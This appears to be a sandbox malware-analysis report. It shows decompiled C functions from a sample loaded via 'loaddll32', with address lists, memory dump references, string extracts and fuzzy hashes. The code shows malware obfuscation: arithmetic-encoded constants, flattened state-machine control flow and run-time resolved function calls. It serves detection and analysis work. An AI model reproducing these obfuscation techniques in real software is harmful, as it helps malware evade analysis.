0x02b37495
0x02b3749d
0x02b374a5
0x02b374b2
0x02b374b3
0x02b374b7
0x02b374bf
0x02b374c7
0x02b374cf
0x02b374e2
0x02b374e6
0x02b374eb
0x02b374f3
0x02b374fb
0x02b37503
0x02b3750b
0x02b37513
0x02b3751b
0x02b37520
0x02b37524
0x02b3752c
0x02b37534
0x02b37539
0x02b37541
0x02b37549
0x02b3754e
0x02b37556
0x02b37556
0x02b37564
0x02b375ad
0x02b375b6
0x02b375be
0x00000000
0x02b37566
0x02b37568
0x02b375a2
0x02b375a7
0x00000000
0x02b3756a
0x02b37570
0x02b3759c
0x02b375f8
0x02b3759e
0x02b3759e
0x00000000
0x02b3759e
0x02b37572
0x02b37574
0x00000000
0x02b37576
0x02b3757e
0x02b37588
0x02b3758e
0x02b37574
0x02b37570
0x02b37568
0x02b375fa
0x02b37602
0x02b37602
0x02b375d2
0x02b375d3
0x02b375d6
0x02b375db
0x02b375de
0x02b375e3
0x02b375e8
0x02b375e8
0x00000000

Strings

K3xq, xrefs: 02B37446
k_, xrefs: 02B3751B
F, xrefs: 02B374EB

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: F$K3xq$k_
API String ID: 0-3174058581
Opcode ID: 66b8938b87ef982cc220c2b0a38936206ba55ee59fdcff7a4ac5577f577ba1c2
Instruction ID: 36f3ef54b67617b9d6c014aa38ca57bca25759c2d6e13847d1646f5bbca3f9fc
Opcode Fuzzy Hash: 66b8938b87ef982cc220c2b0a38936206ba55ee59fdcff7a4ac5577f577ba1c2
Instruction Fuzzy Hash: D341ADB26083029FC759DF24D48592FFBE1FBC4758F100A5EF58696262DB708A08DB97

Uniqueness

Uniqueness Score: -1.00%

Function 02B4A2A5, Relevance: 3.9, Strings: 3, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E02B4A2A5(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t127;
				intOrPtr _t136;

				_v56 = _v56 & 0x00000000;
				_v68 = 0x56d43f;
				_v64 = 0xa378a6;
				_v60 = 0xa37ee;
				_v44 = 0x7acd08;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x000369a9;
				_v12 = 0x8bcc43;
				_v12 = _v12 << 6;
				_v12 = _v12 | 0x230a0204;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0xfb180412;
				_v8 = 0x75376c;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x2bde3cb3;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x15e166f0;
				_v36 = 0x2455a;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffff434e;
				_v36 = _v36 ^ 0xfff24d76;
				_v20 = 0x28ad7b;
				_v20 = _v20 << 6;
				_v20 = _v20 << 0x10;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x00010bf1;
				_v16 = 0xc11cd7;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x000c5122;
				_v48 = 0x6ce03d;
				_v48 = _v48 ^ 0x08e870e9;
				_v48 = _v48 ^ 0x08851ea6;
				_v40 = 0xece1ae;
				_v40 = _v40 | 0xa708c82b;
				_v40 = _v40 + 0xffff66a5;
				_v40 = _v40 ^ 0xa7eb2511;
				_v52 = 0x51901b;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x0285bcb2;
				_v32 = 0xe2234;
				_v32 = _v32 ^ 0x801b0981;
				_v32 = _v32 + 0xffff47d0;
				_v32 = _v32 + 0x1bdf;
				_v32 = _v32 ^ 0x8011a9a9;
				_v28 = 0xf9a2d;
				_v28 = _v28 + 0xffff0cd9;
				_t127 = 0x38;
				_t136 = _a4;
				_v28 = _v28 * 0x39;
				_v28 = _v28 + 0xf1da;
				_v28 = _v28 ^ 0x0344abfa;
				_v24 = 0x8a904b;
				_v24 = _v24 + 0x44ce;
				_v24 = _v24 / _t127;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x27a49ff9;
				_t121 =  *((intOrPtr*)(_t136 + 0x2c))( *((intOrPtr*)(_t136 + 0x38)), 1, 0);
				_t143 = _t121;
				if(_t121 != 0) {
					_push(_v36);
					_push(_v8);
					_push(0x2b318ec);
					_t123 = E02B44244(_v44, _v12, _t143);
					_push(_v40);
					_t138 = _t123;
					_push(_v48);
					_push(_t123);
					_push( *((intOrPtr*)(_t136 + 0x38)));
					_t124 = E02B53560(_v20, _v16);
					if(_t124 != 0) {
						 *_t124();
					}
					E02B4FECB(_t138, _v52, _v32, _v28, _v24);
				}
				return 0;
			}

0x02b4a2ac
0x02b4a2b2
0x02b4a2b9
0x02b4a2c0
0x02b4a2c7
0x02b4a2ce
0x02b4a2d2
0x02b4a2d9
0x02b4a2e0
0x02b4a2e4
0x02b4a2eb
0x02b4a2ef
0x02b4a2f6
0x02b4a2fd
0x02b4a301
0x02b4a308
0x02b4a30b
0x02b4a312
0x02b4a319
0x02b4a31d
0x02b4a324
0x02b4a32b
0x02b4a332
0x02b4a336
0x02b4a33a
0x02b4a33e
0x02b4a345
0x02b4a34c
0x02b4a350
0x02b4a354
0x02b4a358
0x02b4a35f
0x02b4a366
0x02b4a36d
0x02b4a374
0x02b4a37b
0x02b4a382
0x02b4a389
0x02b4a390
0x02b4a397
0x02b4a39b
0x02b4a3a2
0x02b4a3a9
0x02b4a3b0
0x02b4a3b7
0x02b4a3be
0x02b4a3c5
0x02b4a3cc
0x02b4a3d9
0x02b4a3da
0x02b4a3dd
0x02b4a3e0
0x02b4a3e7
0x02b4a3ee
0x02b4a3f5
0x02b4a403
0x02b4a406
0x02b4a40a
0x02b4a416
0x02b4a419
0x02b4a41b
0x02b4a41e
0x02b4a421
0x02b4a42a
0x02b4a42f
0x02b4a434
0x02b4a437
0x02b4a439
0x02b4a442
0x02b4a443
0x02b4a446
0x02b4a450
0x02b4a452
0x02b4a452
0x02b4a462
0x02b4a46a
0x02b4a471

Strings

=l, xrefs: 02B4A35F
l7u, xrefs: 02B4A2F6
7, xrefs: 02B4A2C0

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: =l$l7u$7
API String ID: 0-2380881030
Opcode ID: 549189a07e11db918ab6192e9e904e66b34d58f6af5cdab59b6f58fa878ce2b0
Instruction ID: 3f899f22f6d19a4a0e101c6556a27a4c630ad784ec10e16de368053ce969e3b7
Opcode Fuzzy Hash: 549189a07e11db918ab6192e9e904e66b34d58f6af5cdab59b6f58fa878ce2b0
Instruction Fuzzy Hash: 18512071D0021AEBDF45CFE5D98A5EEBBB1FF44318F208198D912B2220D7B44A59CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B3BAA9, Relevance: 3.8, Strings: 3, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02B3BAA9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t119;
				signed int _t120;

				_t119 = _a12;
				_push(_t119);
				_push(_a8);
				_push(_a4);
				E02B4FE29(_t91);
				_v36 = _v36 & 0x00000000;
				_v40 = 0x12a44;
				_v16 = 0x6d7ae4;
				_t109 = 9;
				_v16 = _v16 * 0x2c;
				_v16 = _v16 ^ 0x12d84a78;
				_v8 = 0x632f63;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x2f02a769;
				_v8 = _v8 + 0xffffcf5a;
				_v8 = _v8 ^ 0xb8bafcbb;
				_a12 = 0xb71f5c;
				_a12 = _a12 + 0x2974;
				_a12 = _a12 / _t109;
				_t110 = 0x4b;
				_a12 = _a12 * 0x6a;
				_a12 = _a12 ^ 0x0865fbc8;
				_v28 = 0x14d1df;
				_v28 = _v28 + 0x8244;
				_v28 = _v28 ^ 0x001f502f;
				_v24 = 0x8a40f8;
				_v24 = _v24 | 0x61e91a85;
				_v24 = _v24 ^ 0x61e69297;
				_v32 = 0x91ce11;
				_v32 = _v32 + 0xffffd148;
				_v32 = _v32 ^ 0x009b82ce;
				_v20 = 0xf1824f;
				_v20 = _v20 / _t110;
				_v20 = _v20 ^ 0x68027ae2;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x3404b933;
				E02B3DC1B(_t110);
				_v16 = 0x8712a3;
				_v16 = _v16 + 0xf3d2;
				_v16 = _v16 + 0xffff1cdd;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004395;
				_v12 = 0x6a396b;
				_v12 = _v12 | 0x9b16e6b5;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x006fffe0;
				_t120 = E02B4CCA0(_v16, _v12);
				E02B3E404(_v32, 1, _v20, _t120, _t119);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}

0x02b3bab1
0x02b3bab4
0x02b3bab5
0x02b3bab8
0x02b3babd
0x02b3bac2
0x02b3bac8
0x02b3bacf
0x02b3badc
0x02b3badf
0x02b3bae2
0x02b3bae9
0x02b3baf0
0x02b3baf4
0x02b3bafb
0x02b3bb02
0x02b3bb09
0x02b3bb10
0x02b3bb1e
0x02b3bb25
0x02b3bb26
0x02b3bb29
0x02b3bb30
0x02b3bb37
0x02b3bb3e
0x02b3bb45
0x02b3bb4c
0x02b3bb53
0x02b3bb5a
0x02b3bb61
0x02b3bb68
0x02b3bb6f
0x02b3bb7b
0x02b3bb7e
0x02b3bb85
0x02b3bb88
0x02b3bb92
0x02b3bb97
0x02b3bba1
0x02b3bba8
0x02b3bbaf
0x02b3bbb3
0x02b3bbba
0x02b3bbc1
0x02b3bbc8
0x02b3bbcc
0x02b3bbd0
0x02b3bbee
0x02b3bbfb
0x02b3bc05
0x02b3bc0e

Strings

k9j, xrefs: 02B3BBBA
c/c, xrefs: 02B3BAE9
zm, xrefs: 02B3BACF

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: c/c$k9j$zm
API String ID: 0-1793526708
Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction ID: 0df3bf867b606b822d3e279051446e6ca330fb5e88a7950d7c33b88a4837cc98
Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction Fuzzy Hash: 2A410372D0030AABCB04DFA5D84A5EEBBB2FF44314F108599E525A6260D7B49B54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B4AD08, Relevance: 2.7, Strings: 2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B4AD08() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t263;
				intOrPtr _t264;
				intOrPtr _t267;
				void* _t273;
				void* _t277;
				intOrPtr _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int* _t322;

				_t322 =  &_v1144;
				_v1052 = 0x3e8be7;
				_t310 = 0;
				_t277 = 0xe4a3d19;
				_v1048 = 0;
				_v1044 = 0;
				_v1100 = 0x8001b8;
				_t311 = 0x1c;
				_v1100 = _v1100 / _t311;
				_v1100 = _v1100 + 0x9b02;
				_v1100 = _v1100 ^ 0x0003825e;
				_v1104 = 0x6ba50e;
				_v1104 = _v1104 + 0x86a8;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0xb0a58b81;
				_v1064 = 0xa5f60f;
				_v1064 = _v1064 ^ 0xf15b406a;
				_v1064 = _v1064 ^ 0xf1fbbabe;
				_v1116 = 0xfce2df;
				_v1116 = _v1116 ^ 0xb7cf3da1;
				_v1116 = _v1116 + 0x963f;
				_v1116 = _v1116 ^ 0x6f9af2b2;
				_v1116 = _v1116 ^ 0xd8ae206e;
				_v1132 = 0x6fbbde;
				_v1132 = _v1132 | 0xe49a2ecd;
				_v1132 = _v1132 + 0xd857;
				_v1132 = _v1132 + 0xffffaa9b;
				_v1132 = _v1132 ^ 0xe507ae81;
				_v1096 = 0xa4704d;
				_v1096 = _v1096 + 0x7787;
				_t312 = 0x67;
				_v1096 = _v1096 / _t312;
				_v1096 = _v1096 ^ 0x00025cd8;
				_v1084 = 0x38937;
				_t313 = 0x79;
				_v1084 = _v1084 * 0x4f;
				_v1084 = _v1084 ^ 0x5b1a1bbe;
				_v1084 = _v1084 ^ 0x5a043b4e;
				_v1136 = 0x1276ee;
				_v1136 = _v1136 + 0xffffa0e4;
				_v1136 = _v1136 + 0xffff74bb;
				_v1136 = _v1136 << 2;
				_v1136 = _v1136 ^ 0x0044c443;
				_v1068 = 0xe79065;
				_v1068 = _v1068 << 0xc;
				_v1068 = _v1068 + 0xcbe6;
				_v1068 = _v1068 ^ 0x7908daa4;
				_v1088 = 0x9a4bed;
				_v1088 = _v1088 + 0xfffff274;
				_v1088 = _v1088 + 0xb36d;
				_v1088 = _v1088 ^ 0x00951f6d;
				_v1144 = 0x62e226;
				_v1144 = _v1144 ^ 0x3dd3a3b2;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff6a42;
				_v1144 = _v1144 ^ 0x0008f37a;
				_v1108 = 0x394fd6;
				_v1108 = _v1108 * 0x13;
				_v1108 = _v1108 / _t313;
				_v1108 = _v1108 ^ 0x00080299;
				_v1120 = 0x93d07f;
				_v1120 = _v1120 << 0xa;
				_t314 = 5;
				_v1120 = _v1120 / _t314;
				_v1120 = _v1120 ^ 0x44bcf5d7;
				_v1120 = _v1120 ^ 0x4b68940f;
				_v1072 = 0xc1f636;
				_v1072 = _v1072 | 0x86bbf578;
				_t315 = 0x47;
				_v1072 = _v1072 * 0x24;
				_v1072 = _v1072 ^ 0xfb68157e;
				_v1080 = 0x3ac036;
				_v1080 = _v1080 + 0xffffbaa8;
				_v1080 = _v1080 ^ 0x136d94c6;
				_v1080 = _v1080 ^ 0x1353f0eb;
				_v1128 = 0xb3095e;
				_v1128 = _v1128 / _t315;
				_v1128 = _v1128 | 0xf7128eca;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x0004e558;
				_v1076 = 0x73500f;
				_v1076 = _v1076 | 0x9d7bc413;
				_v1076 = _v1076 + 0xffff6f55;
				_v1076 = _v1076 ^ 0x9d72e045;
				_v1124 = 0xc98916;
				_v1124 = _v1124 + 0x2b72;
				_v1124 = _v1124 | 0x4777986b;
				_t316 = 0x69;
				_v1124 = _v1124 / _t316;
				_v1124 = _v1124 ^ 0x00ab5a68;
				_v1140 = 0xc8b3ea;
				_t317 = 0x7e;
				_v1140 = _v1140 / _t317;
				_v1140 = _v1140 | 0x89e2a6fa;
				_v1140 = _v1140 >> 4;
				_v1140 = _v1140 ^ 0x08902903;
				_v1092 = 0x846906;
				_v1092 = _v1092 | 0x1b02230c;
				_v1092 = _v1092 + 0xffff209e;
				_v1092 = _v1092 ^ 0x1b8bec31;
				_v1056 = 0xaf8c32;
				_t318 = 0x2e;
				_v1056 = _v1056 / _t318;
				_v1056 = _v1056 ^ 0x00017103;
				_v1060 = 0x7e9355;
				_v1060 = _v1060 >> 0x10;
				_v1060 = _v1060 ^ 0x0008a840;
				_v1112 = 0x76e6c0;
				_v1112 = _v1112 ^ 0x1858c3ee;
				_t319 = 0x68;
				_v1112 = _v1112 / _t319;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0x000255a3;
				do {
					while(_t277 != 0xc59040) {
						if(_t277 == 0x420aa66) {
							_push(_v1084);
							_push(_v1096);
							_push(_v1132);
							_t263 = E02B4E1F8(0x2b31000, _v1116, __eflags);
							_t264 =  *0x2b56214; // 0x0
							_t267 =  *0x2b56214; // 0x0
							E02B52D0A(_v1068, __eflags, _t267 + 0x23c, _v1088, _v1144, _v1108, 0x2b31000,  &_v1040, _t264 + 0x34, _t263);
							E02B4FECB(_t263, _v1120, _v1072, _v1080, _v1128);
							_t322 =  &(_t322[0xe]);
							_t277 = 0x835dcf5;
							continue;
						} else {
							if(_t277 == 0x835dcf5) {
								_t273 = E02B4654A(_v1076, _v1124, __eflags,  &_v520, _v1140,  &_v1040);
								_t322 =  &(_t322[3]);
								__eflags = _t273;
								_t310 =  !=  ? 1 : _t310;
								_t277 = 0xb7cde49;
								continue;
							} else {
								if(_t277 == 0xb7cde49) {
									E02B47A0F(_v1092,  &_v1040, _v1056, _v1060, _v1112);
								} else {
									if(_t277 != 0xe4a3d19) {
										goto L10;
									} else {
										_t277 = 0xc59040;
										continue;
									}
								}
							}
						}
						L13:
						return _t310;
					}
					E02B50DB1(_v1100,  &_v520, __eflags, _v1104, _t277, _v1064);
					_t322 =  &(_t322[3]);
					_t277 = 0x420aa66;
					L10:
					__eflags = _t277 - 0xd159d29;
				} while (__eflags != 0);
				goto L13;
			}

0x02b4ad08
0x02b4ad0e
0x02b4ad1c
0x02b4ad1e
0x02b4ad23
0x02b4ad27
0x02b4ad2b
0x02b4ad39
0x02b4ad3e
0x02b4ad44
0x02b4ad4c
0x02b4ad54
0x02b4ad5c
0x02b4ad64
0x02b4ad69
0x02b4ad71
0x02b4ad79
0x02b4ad81
0x02b4ad89
0x02b4ad91
0x02b4ad99
0x02b4ada1
0x02b4ada9
0x02b4adb1
0x02b4adb9
0x02b4adc1
0x02b4adc9
0x02b4add1
0x02b4add9
0x02b4ade1
0x02b4aded
0x02b4adf2
0x02b4adf8
0x02b4ae00
0x02b4ae0d
0x02b4ae0e
0x02b4ae12
0x02b4ae1a
0x02b4ae22
0x02b4ae2a
0x02b4ae32
0x02b4ae3a
0x02b4ae3f
0x02b4ae47
0x02b4ae4f
0x02b4ae54
0x02b4ae5c
0x02b4ae64
0x02b4ae6c
0x02b4ae74
0x02b4ae7c
0x02b4ae84
0x02b4ae8c
0x02b4ae94
0x02b4ae99
0x02b4aea1
0x02b4aea9
0x02b4aeb6
0x02b4aec0
0x02b4aec4
0x02b4aecc
0x02b4aed4
0x02b4aee1
0x02b4aee6
0x02b4aeec
0x02b4aef9
0x02b4af06
0x02b4af0e
0x02b4af1b
0x02b4af1e
0x02b4af22
0x02b4af2a
0x02b4af32
0x02b4af3a
0x02b4af42
0x02b4af4a
0x02b4af5a
0x02b4af5e
0x02b4af66
0x02b4af6b
0x02b4af73
0x02b4af7b
0x02b4af83
0x02b4af8b
0x02b4af93
0x02b4af9b
0x02b4afa3
0x02b4afaf
0x02b4afb4
0x02b4afba
0x02b4afc2
0x02b4afce
0x02b4afd3
0x02b4afd9
0x02b4afe1
0x02b4afe6
0x02b4afee
0x02b4aff6
0x02b4affe
0x02b4b006
0x02b4b00e
0x02b4b01a
0x02b4b01f
0x02b4b025
0x02b4b02d
0x02b4b035
0x02b4b03a
0x02b4b042
0x02b4b04a
0x02b4b056
0x02b4b059
0x02b4b05d
0x02b4b062
0x02b4b06a
0x02b4b06a
0x02b4b074
0x02b4b0ca
0x02b4b0d3
0x02b4b0d7
0x02b4b0df
0x02b4b0e9
0x02b4b108
0x02b4b11b
0x02b4b135
0x02b4b13a
0x02b4b13d
0x00000000
0x02b4b076
0x02b4b07c
0x02b4b0b3
0x02b4b0ba
0x02b4b0be
0x02b4b0c0
0x02b4b0c3
0x00000000
0x02b4b07e
0x02b4b084
0x02b4b187
0x02b4b08a
0x02b4b090
0x00000000
0x02b4b096
0x02b4b096
0x00000000
0x02b4b096
0x02b4b090
0x02b4b084
0x02b4b07c
0x02b4b18f
0x02b4b19b
0x02b4b19b
0x02b4b15b
0x02b4b160
0x02b4b163
0x02b4b165
0x02b4b165
0x02b4b165
0x00000000

Strings

r+, xrefs: 02B4AF9B
&b, xrefs: 02B4AE84

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: &b$r+
API String ID: 0-3016113347
Opcode ID: add7ac7fb46c27c6130fec833da78c8af959a66e094ca8693a3927fca5883f0d
Instruction ID: 3ded9fbf0e3607b8068596c13f837c33540273f8eb2d63186953abe3ce1d78f3
Opcode Fuzzy Hash: add7ac7fb46c27c6130fec833da78c8af959a66e094ca8693a3927fca5883f0d
Instruction Fuzzy Hash: 1AC121B15093409FC3A8CF66C98990BFBE1FBD4758F108A5DF29686260D7B5C949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B44F74, Relevance: 2.7, Strings: 2, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02B44F74() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t210;
				signed int _t211;
				intOrPtr _t213;
				void* _t217;
				intOrPtr _t224;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int* _t253;

				_t253 =  &_v604;
				_v528 = 0xeac4cc;
				_v528 = _v528 | 0xab847aec;
				_t217 = 0x3550051;
				_v528 = _v528 ^ 0xabe53c27;
				_v564 = 0x85ed10;
				_v564 = _v564 << 0xe;
				_v564 = _v564 | 0x02c2a82c;
				_v564 = _v564 ^ 0x7bc732f4;
				_v548 = 0x432dfc;
				_v548 = _v548 ^ 0x2e419a47;
				_v548 = _v548 ^ 0x2e0248f0;
				_v556 = 0x7b6619;
				_t246 = 0x1c;
				_v556 = _v556 / _t246;
				_v556 = _v556 << 0x10;
				_v556 = _v556 ^ 0x68371ab0;
				_v568 = 0x76f94b;
				_t247 = 7;
				_v568 = _v568 / _t247;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x1fed9d10;
				_v572 = 0x34fb4;
				_t248 = 0xf;
				_v572 = _v572 * 0x24;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x0007943f;
				_v536 = 0xc9a576;
				_v536 = _v536 + 0xffff9d44;
				_v536 = _v536 ^ 0x00c7b609;
				_v596 = 0xae9ff5;
				_v596 = _v596 + 0xffff6f16;
				_v596 = _v596 / _t248;
				_v596 = _v596 ^ 0xfe5a1390;
				_v596 = _v596 ^ 0xfe515394;
				_v588 = 0xa8ac90;
				_t249 = 0x17;
				_v588 = _v588 / _t249;
				_v588 = _v588 << 4;
				_v588 = _v588 + 0xfffff77b;
				_v588 = _v588 ^ 0x007f9eed;
				_v600 = 0xc58072;
				_v600 = _v600 + 0xffffcbc9;
				_v600 = _v600 << 4;
				_v600 = _v600 * 0x72;
				_v600 = _v600 ^ 0x7db93259;
				_v604 = 0x4fbb0c;
				_v604 = _v604 << 0xa;
				_v604 = _v604 << 7;
				_v604 = _v604 * 0x27;
				_v604 = _v604 ^ 0xfda02730;
				_v544 = 0x5fc89d;
				_v544 = _v544 | 0x6496792e;
				_v544 = _v544 ^ 0x64dc06aa;
				_v580 = 0xa4bd54;
				_v580 = _v580 + 0xffff47e7;
				_v580 = _v580 >> 0x10;
				_v580 = _v580 + 0xffff9f11;
				_v580 = _v580 ^ 0xfff905b7;
				_v560 = 0x8ec0a6;
				_v560 = _v560 ^ 0x51bd2871;
				_t250 = 0x75;
				_v560 = _v560 / _t250;
				_v560 = _v560 ^ 0x00b97c8d;
				_v584 = 0x6990b8;
				_v584 = _v584 ^ 0x9d650ba3;
				_v584 = _v584 ^ 0x6675860f;
				_v584 = _v584 + 0xffff1bcf;
				_v584 = _v584 ^ 0xfb748c23;
				_v592 = 0xef0f92;
				_v592 = _v592 ^ 0x945975ed;
				_v592 = _v592 + 0xffff8646;
				_v592 = _v592 + 0xfffff2e1;
				_v592 = _v592 ^ 0x94bb4d80;
				_v552 = 0xcb75d7;
				_t251 = 0x65;
				_v552 = _v552 * 0x6f;
				_v552 = _v552 ^ 0xe1e1c84b;
				_v552 = _v552 ^ 0xb9d9c47b;
				_v576 = 0x1cf321;
				_v576 = _v576 + 0xffffc0e0;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 7;
				_v576 = _v576 ^ 0x000d9bab;
				_v532 = 0x45ea0d;
				_v532 = _v532 / _t251;
				_v532 = _v532 ^ 0x000fbf52;
				_v540 = 0x89573e;
				_v540 = _v540 + 0xffffd980;
				_v540 = _v540 ^ 0x008ac7ea;
				do {
					while(_t217 != 0x2095a83) {
						if(_t217 == 0x3550051) {
							_t217 = 0xca1b903;
							continue;
						} else {
							if(_t217 == 0xba5f136) {
								_t210 = E02B409DD(_v560,  &_v524, _v584, _v592);
								 *_t210 = 0;
								_t217 = 0x2095a83;
								continue;
							} else {
								_t259 = _t217 - 0xca1b903;
								if(_t217 == 0xca1b903) {
									_push(_v556);
									_push(_v548);
									_push(_v564);
									_t211 = E02B4E1F8(0x2b31000, _v528, _t259);
									_t224 =  *0x2b56214; // 0x0
									_t251 = _t211;
									_t213 =  *0x2b56214; // 0x0
									E02B52D0A(_v572, _t259, _t213 + 0x23c, _v536, _v596, _v588, _t224 + 0x34,  &_v524, _t224 + 0x34, _t211);
									_t210 = E02B4FECB(_t211, _v600, _v604, _v544, _v580);
									_t253 =  &(_t253[0xe]);
									_t217 = 0xba5f136;
									continue;
								}
							}
						}
						goto L9;
					}
					L02B4437A(0x9325c58, E02B4BEFD, _v552, 0xca1b903, _t251, _v576, _v532, _v540, 0,  &_v524,  &_v524);
					_t253 =  &(_t253[6]);
					_t217 = 0x9325c58;
					L9:
					__eflags = _t217 - 0x9325c58;
				} while (__eflags != 0);
				return _t210;
			}

0x02b44f74
0x02b44f7a
0x02b44f84
0x02b44f8c
0x02b44f91
0x02b44f99
0x02b44fa1
0x02b44fa6
0x02b44fae
0x02b44fb6
0x02b44fbe
0x02b44fc6
0x02b44fce
0x02b44fe0
0x02b44fe5
0x02b44feb
0x02b44ff0
0x02b44ff8
0x02b45004
0x02b45009
0x02b4500f
0x02b45014
0x02b4501c
0x02b45029
0x02b4502c
0x02b45030
0x02b45035
0x02b4503d
0x02b45045
0x02b4504d
0x02b45055
0x02b4505d
0x02b4506d
0x02b45071
0x02b45079
0x02b45081
0x02b4508d
0x02b45090
0x02b45094
0x02b45099
0x02b450a1
0x02b450a9
0x02b450b1
0x02b450b9
0x02b450c3
0x02b450c7
0x02b450cf
0x02b450d7
0x02b450dc
0x02b450e6
0x02b450ea
0x02b450f2
0x02b450fa
0x02b45102
0x02b4510a
0x02b45112
0x02b4511a
0x02b4511f
0x02b45127
0x02b4512f
0x02b45139
0x02b45151
0x02b45156
0x02b4515c
0x02b45169
0x02b45171
0x02b45179
0x02b45181
0x02b45189
0x02b45191
0x02b45199
0x02b451a1
0x02b451a9
0x02b451b1
0x02b451b9
0x02b451c6
0x02b451c7
0x02b451cb
0x02b451d3
0x02b451db
0x02b451e3
0x02b451eb
0x02b451f0
0x02b451f5
0x02b451fd
0x02b4520b
0x02b4520f
0x02b45217
0x02b4521f
0x02b45227
0x02b4522f
0x02b4522f
0x02b4523d
0x02b452f2
0x00000000
0x02b45243
0x02b45249
0x02b452df
0x02b452e8
0x02b452eb
0x00000000
0x02b4524f
0x02b4524f
0x02b45251
0x02b45257
0x02b45260
0x02b45264
0x02b4526c
0x02b45271
0x02b4527a
0x02b45293
0x02b452a6
0x02b452bd
